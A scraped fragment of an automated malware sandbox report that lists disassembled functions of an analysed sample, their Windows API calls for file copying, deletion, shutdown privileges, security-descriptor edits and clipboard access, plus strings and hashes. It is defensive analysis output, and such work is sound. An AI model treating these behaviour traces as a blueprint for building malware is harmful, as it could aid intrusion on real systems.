                            • _wcscat.LIBCMT ref: 0044BD94
                            • _wcscat.LIBCMT ref: 0044BDBD
                            • __wsplitpath.LIBCMT ref: 0044BDEA
                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                            • _wcscpy.LIBCMT ref: 0044BE71
                            • _wcscat.LIBCMT ref: 0044BE83
                            • _wcscat.LIBCMT ref: 0044BE95
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                            • String ID: \*.*
                            • API String ID: 2188072990-1173974218
                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                            Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                            • FindClose.KERNEL32(00000000), ref: 00478924
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                            • __swprintf.LIBCMT ref: 004789D3
                            • __swprintf.LIBCMT ref: 00478A1D
                            • __swprintf.LIBCMT ref: 00478A4B
                            • __swprintf.LIBCMT ref: 00478A79
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                            • __swprintf.LIBCMT ref: 00478AA7
                            • __swprintf.LIBCMT ref: 00478AD5
                            • __swprintf.LIBCMT ref: 00478B03
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 999945258-2428617273
                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                            Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                            • __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscpy.LIBCMT ref: 004034A7
                            • _wcscat.LIBCMT ref: 004034BC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                            • _wcscpy.LIBCMT ref: 004035A0
                            • _wcslen.LIBCMT ref: 00403623
                            • _wcslen.LIBCMT ref: 0040367D
                            Strings
                            • _, xrefs: 0040371C
                            • Unterminated string, xrefs: 00428348
                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                            • Error opening the file, xrefs: 00428231
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                            • API String ID: 3393021363-188983378
                            • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                            • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                            Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                            • FindClose.KERNEL32(00000000), ref: 00431B20
                            • FindClose.KERNEL32(00000000), ref: 00431B34
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1409584000-438819550
                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                            Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                            • __swprintf.LIBCMT ref: 00431C2E
                            • _wcslen.LIBCMT ref: 00431C3A
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                            • String ID: :$\$\??\%s
                            • API String ID: 2192556992-3457252023
                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                            Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                            • __swprintf.LIBCMT ref: 004722B9
                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FolderPath$LocalTime__swprintf
                            • String ID: %.3d
                            • API String ID: 3337348382-986655627
                            • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                            • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                            Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                            • FindClose.KERNEL32(00000000), ref: 0044291C
                            • FindClose.KERNEL32(00000000), ref: 00442930
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                            • FindClose.KERNEL32(00000000), ref: 004429D4
                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                            • FindClose.KERNEL32(00000000), ref: 004429E2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 2640511053-438819550
                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                            Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                            • GetLastError.KERNEL32 ref: 00433414
                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                            • String ID: SeShutdownPrivilege
                            • API String ID: 2938487562-3733053543
                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                            Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                            • CopySid.ADVAPI32(00000000), ref: 00446271
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                            • String ID:
                            • API String ID: 1255039815-0
                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                            Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • __swprintf.LIBCMT ref: 00433073
                            • __swprintf.LIBCMT ref: 00433085
                            • __wcsicoll.LIBCMT ref: 00433092
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                            • LockResource.KERNEL32(00000000), ref: 004330CA
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                            • LockResource.KERNEL32(?), ref: 00433120
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                            • String ID:
                            • API String ID: 1158019794-0
                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                            Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                            Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                            • GetLastError.KERNEL32 ref: 0045D6BF
                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
